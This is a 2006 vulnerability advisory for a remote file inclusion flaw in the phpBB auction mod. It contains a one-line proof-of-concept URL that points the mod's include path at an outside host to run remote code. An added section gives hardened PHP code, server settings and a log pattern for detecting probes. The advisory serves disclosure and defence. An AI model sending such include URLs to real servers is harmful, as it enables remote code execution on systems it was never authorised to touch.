by r0t,der4444,cembo,VietMafia

Wednesday, May 03, 2006

phpBB auction mod - Remote File Inclusion Vuln

===================================
developer's site: http://www.phpbb-auction.com
script: Auction mod for phpBB
risk: critical
status: unpatched
discovered by: VietMafia
===================================

Vuln. Description:

This flaw is due to an input validation error in "aution\auction_common.php" (line 26),
which does not validate the "$phpbb_root_path" variable properly before using it in an include.
Remote attackers can include malicious scripts and execute arbitrary commands with the
privileges of the web server.

PoC:

http://[target]/[path]/aution\auction_common.php?phpbb_root_path=http://unsecured-systems.com/forum/
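As an added illustration (this is not code from the advisory or from the phpBB auction mod), the include pattern the description above implies, reconstructed from the usual phpBB 2 mod conventions, next to a hardened form of the same file header. The include target `extension.inc`, the assumption that the mod sits in a subdirectory of the forum root, and the assumption that `register_globals` is what lets the query-string value reach `$phpbb_root_path` are mine, not statements from the advisory.

```php
<?php
// Added example, not the auction mod's own code. Reconstructs the kind of
// include the advisory describes and shows a hardened replacement.

// --- Vulnerable pattern (assumed) ---------------------------------------
// If this file can be requested directly and register_globals is on, any
// request parameter becomes a PHP global, so $phpbb_root_path is taken from
// the query string. With allow_url_fopen / allow_url_include enabled the
// include() then fetches and executes a remote file. Kept as a comment so
// nothing here is exploitable:
//
//   include($phpbb_root_path . 'extension.inc');   // vulnerable

// --- Hardened version ----------------------------------------------------
// 1. Refuse direct requests. phpBB 2 pages define IN_PHPBB before including
//    shared files; a file reached straight from the browser never has it.
if (!defined('IN_PHPBB')) {
    die('Hacking attempt');
}

// 2. Never derive the root path from request data. Anchor it to this file's
//    own location (assumption: the mod lives in <forum>/auction/).
$phpbb_root_path = dirname(__FILE__) . '/../';

// 3. Resolve the final include target and verify it stays inside the forum
//    directory before including it. realpath() returns false for anything
//    that does not exist on the local filesystem, which also rejects URLs.
$forum_dir = realpath(dirname(__FILE__) . '/..');
$target    = realpath($phpbb_root_path . 'extension.inc');

if ($forum_dir === false
    || $target === false
    || strpos($target, $forum_dir . DIRECTORY_SEPARATOR) !== 0) {
    die('Invalid include path');
}

include($target);
```

The guard in step 1 is the fix that matches how phpBB 2 itself protects shared files; steps 2 and 3 make the file safe even on a host where `register_globals` is still on. Independently of the code, disabling `register_globals`, `allow_url_fopen` and `allow_url_include` in `php.ini` removes the remote-include primitive for every script on the server, and a request log entry carrying `phpbb_root_path=http://` or `phpbb_root_path=ftp://` in the query string is a reliable indicator that someone is probing for this class of bug.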

===================================
have a good time all my friends
===================================

Copyright (c) 2006 Pridels Sec Crew